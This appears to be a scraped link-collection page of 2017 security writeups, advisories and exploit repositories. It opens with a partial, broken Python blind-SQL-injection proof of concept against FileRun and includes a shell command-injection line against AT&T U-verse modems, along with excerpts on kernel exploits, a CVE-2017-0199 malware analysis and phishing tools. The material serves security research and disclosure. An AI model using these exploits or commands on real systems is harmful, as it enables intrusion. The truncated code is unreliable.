
Bug Bounty & Exploits


Bug Bounty

FileRun < 2017.09.18 - SQL Injection.

    #!/usr/bin/env python
    # Exploit Title: FileRun <= 2017.09.18
    # Date: September 29, 2017
    # Exploit Author: SPARC
    # Version: 2017.09.18
    # Tested on: Ubuntu 16.04.3, Apache 2.4.7, PHP 7.0

    import sys, time, urllib, urllib2, cookielib
    from time import sleep

    print """
    | FileRun <= 2017.09.18                            |
    | BlindSQLi Proof of Concept (Post Authentication) |
    | by Spentera Research (research[at]               |
    """

    host = raw_input("[*] Target IP: ")
    username = raw_input("[*] Username: ")
    password = raw_input("[*] Password: ")
    delay = 1
    global cookie, data

    def masuk(usr, pswd):
        # log in with the supplied credentials and keep the session cookie
        log_data = {
            'username': usr,
            'password': pswd
        }
        post_data = urllib.urlencode(log_data)
        cookjar = cookielib.CookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookjar))
        try:
            content =
            global data, cookie
            data = dict((cookie.name, cookie.value) for cookie in cookjar)
            cookie = ("language=english; FileRunSID=%s" % (data['FileRunSID']))
            return str(
        except:
            print '\n[-] Uh oh!'
            sys.exit(0)

    def konek(m, n):
        # borrow from SQLmap :)
        sleep(1)

Car Hacking 101 - Alan Mond, LevelUp 2017.

wifiphisher/wifiphisher: Automated victim-customized phishing attacks against Wi-Fi clients.

ImageTragick.

smiegles/crossdomain: Exploit insecure crossdomain.xml files.

XPN InfoSec Blog.
In my previous post, I showed a number of ways of gaining SYSTEM privileges. The post ended up being a lot more successful than I thought it would, so thanks to everyone who checked it out :) In this post I wanted to take a look at something which I touched on previously, and that is just how a Windows kernel based exploit achieves privilege escalation. Rather than take something like HackSys Extreme Vulnerable Windows Driver, I wanted to work on something a little bit different, and came across a vulnerability recently disclosed by Google Project Zero here.

This vulnerability is pretty nice and easy to understand due to the effort mjurczyk put into the writeup, and is also marked as "Won't Fix" by Microsoft, which means that 32-bit versions of Windows 10 Creators Edition are still vulnerable. So.... let's get started.
Vulnerability overview
Reading the disclosure, we can see that this vulnerability affects Windows 10 32-bit Creators Update.
Setting up the lab

Process Injection.

dg fs.

Symantec Encryption Desktop Local Privilege Escalation – Exploiting an Arbitrary Hard Disk Read/Write Vulnerability Over NTFS – Nettitude Labs.

"Huge Dirty COW" (CVE-2017-1000405) – Bindecy.
The "Dirty COW" vulnerability (CVE-2016-5195) is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers, was vulnerable. The impact was vast: millions of users could be compromised easily and reliably, bypassing common exploit defenses. Plenty of information was published about the vulnerability, but its patch was not analyzed in detail. We at Bindecy were interested to study the patch and all of its implications. Surprisingly, despite the enormous publicity the bug had received, we discovered that the patch was incomplete.
"Dirty COW" recap
First, we need a full understanding of the original Dirty COW exploit.

The original vulnerability was in the get_user_pages function. Let's now take a look at the relevant code in __get_user_pages: the while loop's goal is to fetch each page in the requested page range. The original vulnerable code resided at the end of faultin_page:
Transparent Huge Pages (THP)

Mac OS X Local Javascript Quarantine Bypass | segment.
Details
Mac OS X contains a vulnerability that allows the bypass of the Apple Quarantine and the execution of arbitrary Javascript code without restrictions. Basically, Apple's Quarantine works by setting an extended attribute on downloaded files (and also on files extracted from a downloaded archive/image) that tells the system to open/execute those files in a restricted environment. For example, a quarantined html file won't be able to load local resources. The vulnerability is in one html file, part of the Mac OS X core, that is prone to a DOM Based XSS allowing the execution of arbitrary javascript commands in its (unrestricted) context.

A demo video is available at
The mentioned file is located at /System/Library/CoreServices/ and contains the following code: In short, it takes a URL from the "rhtml" query string parameter, makes a request to that URL and evaluates the response content as javascript code.
PoC: #!

CVE-2017-0785/ at master · ojasookert/CVE-2017-0785.

1302 - Apple: Heap Overflow in AppleBCMWLANCore driver when handling Completed Firmware Timestamp messages (0x27) - project-zero - Monorail.

RIPS - Joomla! 3.7.5 - Takeover in 20 Seconds with LDAP Injection.

With over 84 million downloads, Joomla! is one of the most popular content management systems on the World Wide Web. It powers about 3.3% of all websites' content and articles. Our code analysis solution RIPS detected a previously unknown LDAP injection vulnerability in the login controller. This one vulnerability could allow remote attackers to leak the super user password with blind injection techniques and to fully take over any Joomla! <= 3.7.5 installation within seconds that uses LDAP for authentication.
Requirements - Who is affected
Installations with the following requirements are affected by this vulnerability: Joomla! This is not a configuration flaw and an attacker does not need any privileges to exploit this vulnerability.
Impact - What can an attacker do
By exploiting a vulnerability in the login page, an unprivileged remote attacker can efficiently extract all authentication credentials of the LDAP server that is used by the Joomla!

Vulnerability Analysis - CVE-2017-14596.

DIY Spy Program: Abusing Apple's Call Relay Protocol - Martin Vigo.
Introduction
Apple introduced a new set of features in iOS 8 and Yosemite under the name "Continuity". These features allow iPhones to work with other iDevices such as Macs and iPads in new ways. Handoff, Instant Hotspot and AirDrop are some of the new services offered by Continuity. Among these new services is one named "Call Relay". In order for it to work, both devices (iPhone and the iDevice that makes/takes the call) need to be on the same WiFi.
How it works
The first step is to get a high level understanding of the protocol and how the different actors interact.

We can differentiate several actors in different environments.
Environments
The protocol works on 3 different environments that are also 3 possible targets. GSM would imply breaking LTE or taking advantage of existing downgrade attacks.
Approach
Once we have a high level understanding of the protocol we need to get down to raw bytes and work our way up by identifying headers, counters, checksums, payloads, etc.
Discovery
Aha!

Sec17 redini.

How can I securely use CSS-in-JS with React? — React Armory.
CSS-in-JS is an exciting new technology that completely eliminates the need for CSS class names. It makes it possible to add styles directly to your components, using the full power of CSS.

Unfortunately, it also promotes interpolation of unescaped props into that CSS, opening you up to injection attacks. And CSS injection attacks are a major security hazard. If your site or app accepts user input and displays it to other users, usage of CSS-in-JS libraries like styled-components or glamorous may result in your site being defaced. But worse, you may inadvertently allow attackers to make requests from your users' machines, siphon their data, steal their credentials, or even execute arbitrary JavaScript. Of course, it is also possible to use CSS-in-JS safely.
The golden rule
Never interpolate user input into your stylesheets.*
* At least without sanitizing that input first.

If you must use user input for your styles, consider using raw style props.
Exploiting CSS-in-JS
A data-siphoning avatar.

Mastercard Internet Gateway Service: Hashing Design Flaw –
Last year I found a design error in the MD5 version of the hashing method used by Mastercard Internet Gateway Service. The flaw allows modification of the transaction amount. They awarded me a bounty for reporting it. This year, they have switched to HMAC-SHA256, but this one also has a flaw (and no response from MasterCard). If you just want to know what the bug is, skip to the Flaw part.
What is MIGS?
When you pay on a website, the website owner usually just connects their system to an intermediate payment gateway (you will be forwarded to another website).

How does it work?
The payment flow is usually like this if you use MIGS: Notice that instead of communicating directly between servers, communications are done via the user's browser, but everything is signed.
Flaw in the MIGS MD5 Hashing
This bug is extremely simple.

    MD5(Secret + Data)

But it was not vulnerable to a hash length extension attack (some checks were done to prevent this).

    Name: Joe
    Amount: 10000
    Card: 1234567890123456

Objective-See.

High Sierra's 'Secure Kernel Extension Loading' is Broken › a new 'security' feature in macOS 10.13, is trivial to bypass.

Background
With each new release of macOS, Apple introduces new 'built-in' security enhancements...and macOS High Sierra (10.13) is no exception. In this blog post we'll take a brief look at High Sierra's somewhat controversial "Secure Kernel Extension Loading" (SKEL) feature.

    $ kextstat
    Index Refs Size    Wired   Name
    1     90   0x9e30  0x9e30
    2     8    0x3960  0x3960
    ...
    130   0    0x4b00  0x4b000 com.un.approved.kext

Documented in Apple's Technical Note TN2459, Secure Kernel Extension Loading, is "a new feature that requires user approval before loading new third-party kernel extensions." Instead the main (security) goal of SKEL is to block the loading of legitimate but (known) vulnerable kexts.

...was "already installed at the time of upgrading to macOS High Sierra."

Diff - e33fd30777f99a0d6e16b16d096a2663b1031457^! - v8/v8.git - Git at Google.
Diff --git a/src/crankshaft/hydrogen-alias-analysis.h b/src/crankshaft/hydrogen-alias-analysis.h index 1f32b7a..d06aabc 100644 --- a/src/crankshaft/hydrogen-alias-analysis.h +++ b/src/crankshaft/hydrogen-alias-analysis.h diff --git a/test/mjsunit/regress/regress-crbug-722756.js b/test/mjsunit/regress/regress-crbug-722756.js new file mode 100644 index 0000000..b4d82ad --- /dev/null +++ b/test/mjsunit/regress/regress-crbug-722756.js @@ -0,0 +1,40 @@ +// Copyright 2017 the V8 project authors.

SharknAT&To - Nomotion Blog.
Introduction
When evidence of the problems described in this report was first noticed, it almost seemed hard to believe. However, for those familiar with the technical history of Arris and their careless lingering of hardcoded accounts on their products, this report will sadly come as no surprise.

For everyone else, prepare to be horrified. In all fairness, it is uncertain whether these gaping security holes were introduced by Arris (the OEM) or if these problems were added after delivery to the ISP (AT&T U-verse). From examining the firmware, it seems apparent that AT&T engineers have the authority and ability to add and customize code running on these devices, which they then provide to the consumer (as they should). Some of the problems discussed here affect most AT&T U-verse modems regardless of the OEM, while others seem to be OEM specific.

Figure 1: Attacker view of cshell after login to an affected U-verse modem.

    >> ping -c 1;echo /bin/nsh >>/etc/shells

Escaping a Python sandbox with a memory corruption bug.

BIOS SMI Handler Input Validation Failures.
Lenovo Security Advisory: LEN-14695
Potential Impact: Execution of code in System Management Mode by an attacker with local administrative access
Severity: High
Scope of Impact: Industry-Wide
CVE Identifier: CVE-2017-3753
Summary Description: A vulnerability has been identified in some Lenovo products that use UEFI (BIOS) code developed by American Megatrends, Inc.

Mitigation Strategy for Customers (what you should do to protect yourself): AMI has supplied a fix for this vulnerability to Lenovo. Security-conscious users should consider the following mitigation steps if an immediate BIOS update is not possible, to protect themselves to the fullest extent, with the understanding that they DO NOT fix or fully protect against an exploit of this vulnerability:
Product Impact: Please click for more info. Desktop, Desktop - All in One, ThinkServer, ThinkStation
Acknowledgements: Lenovo thanks Alex Matrosov, Principal Research Scientist, Cylance.
Other information and references:
Revision History:

Pre-domain wildcard CORS Exploitation – Arbaz Hussain – Medium.
Exploitation: Now it's time to find a good exploitation endpoint to demonstrate & increase the impact. There was nothing much to exploit, just like a static site asking to install their browser extension. But one thing kept my mindset to find some exploitation path is that to install that extension you need to be logged in.

I doubted they were storing some information somewhere. So I started bruteforcing, reading docs for API endpoints. And came across which contains the user details along with SESSIONID in the JSON response. Able to take over user accounts remotely.

PowerPoint File Armed with CVE-2017-0199 and UAC Bypass.
FortiGuard Labs recently discovered a new malicious PowerPoint file named ADVANCED DIPLOMATIC PROTOCOL AND ETIQUETTE SUMMIT.ppsx. Taking a look at the four slides of the PowerPoint Open XML Slide Show (PPSX) file, we can tell that it targets people from UN agencies, Foreign Ministries, International Organizations, and those who interact with international governments. We will take a look at how opening this PowerPoint file could compromise your system. Here's an overview of how the attack works:
Figure 01: Flow of the attack process
This exploit targets a vulnerability identified as CVE-2017-0199, which was disclosed and patched in April 2017.

It triggers remote code execution in Microsoft Office or WordPad when parsing specially crafted files. This is not the first time we have seen attackers leveraging this vulnerability. When the latest malicious PowerPoint Slide Show is opened, it triggers a script in ppt/slides/_rels/slide1.xml.rels.
Figure 02: PPSX file leveraging CVE-2017-0199.

OS X KERNEL EXPLOIT BASICS (OS X 10.12 SIERRA) | THEORI.
Written by reset + s0ngsari
Although much recent research has focused on the Windows operating system, from a security standpoint iOS and macOS, which ship on the iPhone and MacBook, cannot be left out. This blog series looks at bug analysis and exploitation techniques in the OS X kernel.
(1) Finding kernel bugs: bugs that can be triggered at kernel level, in components such as BSD, Mach and IOKit, are found through methods such as fuzzing and source code auditing.

BSD: the BSD portion of the kernel provides most system calls, networking and file system functionality. Its source was taken from FreeBSD 5.
Mach: derived from the Mach 3.0 microkernel developed at Carnegie Mellon University.
(2) Exploit primitive(s): using arbitrary read/write to obtain the data needed to attack the vulnerability, or to write arbitrary data into kernel space.
(3) Obtaining kernel privileges & AAR/AAW in kernel: to obtain the ipc object and the kernel task, the values needed for kernel_task (pid=0) privileges, traverse every process present in the kernel and dump the data to user space.

(4) Obtaining root privileges: because every process is loaded in kernel memory, locate the target process and set CR_RUID (Credential Real UID) in the process credential structure below to 0 [bsd/sys/ucred.h]. Once the change is done, that process runs with root privileges.
Background
Kernel Zone: the OS X kernel uses a structure called a Zone from which heap memory is allocated.
OOL (Out-Of-Line) Port: holds the non-inline packets that arise in IPC communication; the OOL data is kept in the kernel until it is received.
OS X Kernel Mitigation: kASLR; RWX permissions are prevented in the kernel, bypass: ROP.

Public Database Directory - Public DB Host.

Vulnerable Docker VM - NotSoSecure.

Multiple vulnerabilities in RubyGems.

From random block corruption to privilege escalation: A filesystem attack vector for rowhammer-like attacks.

[Demo] From random block corruption to privilege escalation.

Positive Technologies - learn and secure: Disabling Intel ME 11 via undocumented mode.

Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX.

SensePost | Rattler: identifying and exploiting dll preloading vulnerabilities.

Hyper-V backdoor for UEFI.

A Stealth DoS Attack Against CAN-based Automotive Networks [ICS-ALERT-17-209-0] Mitigation tool.

Le journal d'un reverser: Meet the "Wake" malware: DDOS and more!

Vine User Private information disclosure - Bug Bounty POC.

Benkow_: Quick look at another Alina fork: XBOT-POS.

CVE-2017-0199: New Malware Abuses PowerPoint Slide Show - TrendLabs Security Intelligence Blog.

Thinkst Thoughts...: All your devs are belong to us: how to backdoor the Atom editor.

Office 365 - Advanced Threat Protection (ATP): Features and Shortfalls - TrustedSec.

Harvesting Cb Response Data Leaks for fun and profit | DirectDefense.

Project Zero: Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read.

$10k host header - Test.

Security vulnerabilities fixed in Firefox 55.

Smuggling HTA files in Internet Explorer/Edge.

Shellcode: Windows API hashing with block ciphers (Maru Hash) | modexp.

Creating Real Looking User Accounts in AD Lab.

Juniper Networks - 2017-07 Security Bulletin: SRX Series: Hardcoded credentials in Integrated UserFW feature (CVE-2017-2343).

Microsoft Windows - LNK Shortcut File Code Execution.

android_vuln_poc-exp/EXP-CVE-2016-6738 at master · jiayy/android_vuln_poc-exp.

Stored XSS at Google firebase via Google Cloud IAM.

One Cloud-based Local File Inclusion = Many Companies affected.

A Windows UAC Bypass using Device Manager – i break software.

[BugBounty] Decoding a $□,000.00 htpasswd bounty.

get_content.

[Uber 8k Bug] Login CSRF + Open Redirect = Account Take Over – Ron Chan.

How I could Steal Your Google Bug Hunter Account with Two Clicks in IE – Ron Chan.

Respect XSS: A Look at CVE-2017-8514 --- SharePoint's `Follow` Feature XSS.

Path of Least Resistance: Cellular Baseband to Application Processor Escalation on Mediatek Devices.

1296 - VirtualBox: Windows Process DLL UNC Path Signature Bypass EoP - project-zero - Monorail.

WiSec17 ulqinaku.

Zero Day Initiative — Pythonizing the VMware Backdoor.

Revoke obfuscation report.

Exploiting Cross Origin Resource Sharing.

Hacking Voting Machines at DEF CON 25.

2017 Runner-Up: Neville Longbottom – Underhanded Crypto Contest.

[CVE-2017-11105] OnePlus 2 Lack of SBL1 Validation Broken Secure Boot.